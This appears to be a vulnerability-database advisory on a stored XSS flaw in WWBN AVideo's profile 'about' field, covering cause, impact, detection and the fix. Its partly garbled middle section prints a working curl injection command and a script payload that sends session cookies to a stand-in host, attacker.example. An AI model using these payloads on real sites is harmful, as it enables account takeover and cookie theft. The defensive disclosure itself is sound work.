
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-33683 is a stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo, an open source video platform, affecting all versions up to and including 26.0. The flaw resides in the user profile "about" field, where a sanitization order-of-operations bug allows any registered user to inject arbitrary JavaScript that executes in the browsers of other users visiting their channel page. It was published on March 23, 2026, with a patch committed the same day. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Github Advisory, GHSA Advisory).
The root cause is a sanitization order-of-operations flaw classified as CWE-79 (Improper Neutralization of Input During Web Page Generation). In objects/user.php, the setAbout() method calls strip_specific_tags(xss_esc($about)): the inner xss_esc() function first HTML-encodes the input via htmlspecialchars(), converting <script> to <script>, which causes the subsequent strip_specific_tags() regex patterns to never match the now-encoded tags — rendering the tag stripping completely ineffective. On output in view/channelBody.php, html_entity_decode() reverses the encoding and the raw malicious HTML is echoed directly into the page. A secondary bypass exists because the <img> tag is not in the strip_specific_tags blocklist, allowing <img src=x onerror=...> payloads to bypass even the intended sanitization without relying on the encoding flaw (GHSA Advisory, Github Advisory).
Successful exploitation enables session hijacking — an attacker can steal session cookies of any user, including administrators, who visits their channel page, potentially leading to full account takeover and administrative access to the AVideo instance. The channel page is publicly accessible without authentication, meaning the injected payload executes for all visitors, not just logged-in users. Additional impacts include phishing via injected fake login forms, redirection to malicious sites, and a self-propagating XSS worm that could programmatically modify other users' profiles (GHSA Advisory).
A proof-of-concept exploit with concrete curl commands and payloads is publicly available in the GitHub Security Advisory, demonstrating both <img onerror> and <script> tag vectors for session cookie theft. Exploitation requires only a low-privileged registered account to inject the payload, while the payload executes against any visitor (including unauthenticated users) to the attacker's channel page. There is no evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The EPSS score is approximately 0.029–0.041%, placing it in the 13th percentile for exploitation likelihood (GHSA Advisory, Github Advisory).
PHPSESSID).objects/userUpdate.json.php with a malicious about field value. Use an <img> tag payload (bypasses the blocklist entirely) or a <script> tag payload (bypasses via the encoding flaw):curl -X POST 'https://TARGET/objects/userUpdate.json.php' \
-H 'Cookie: PHPSESSID=ATTACKER_SESSION' \
-d 'about=<img src=x onerror=alert(document.cookie)>&user=attacker&pass=password123&email=attacker@example.com&name=Attacker&analyticsCode=&donationLink=&phone='https://TARGET/channel/attacker. No authentication is required for victims to trigger the payload.fetch-based payload, session cookies are exfiltrated to an attacker-controlled server:-d 'about=<script>fetch("https://attacker.example/steal?c="+document.cookie)</script>...'attacker.example) with query parameters containing cookie values; unusual POST requests to /objects/userUpdate.json.php with HTML tags (<script>, <img>, <iframe>) in the about parameter./objects/userUpdate.json.php with encoded or raw HTML payloads in the request body; access log entries for /channel/<username> from a wide range of IPs following a profile update.<script>, <img src=x onerror=, <iframe>, or Base64-encoded JavaScript; unexpected JavaScript content stored in the about column of the users table.The official fix is implemented in commit 7cfdc380dae1e56bbb5de581470d9e9957445df0, which replaces the flawed sanitization in view/channelBody.php with HTMLPurifier applied after html_entity_decode(), using a strict allowlist of safe HTML tags and attributes. Administrators should update to a version of AVideo that includes this commit. As a temporary workaround, restrict which users can modify their profile "about" field, or disable the display of user-provided about content on channel pages until patching is complete. Alternatively, removing the html_entity_decode() call from view/channelBody.php or reversing the sanitization order (calling strip_specific_tags before xss_esc) would also mitigate the vulnerability (GHSA Advisory, Patch Commit).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."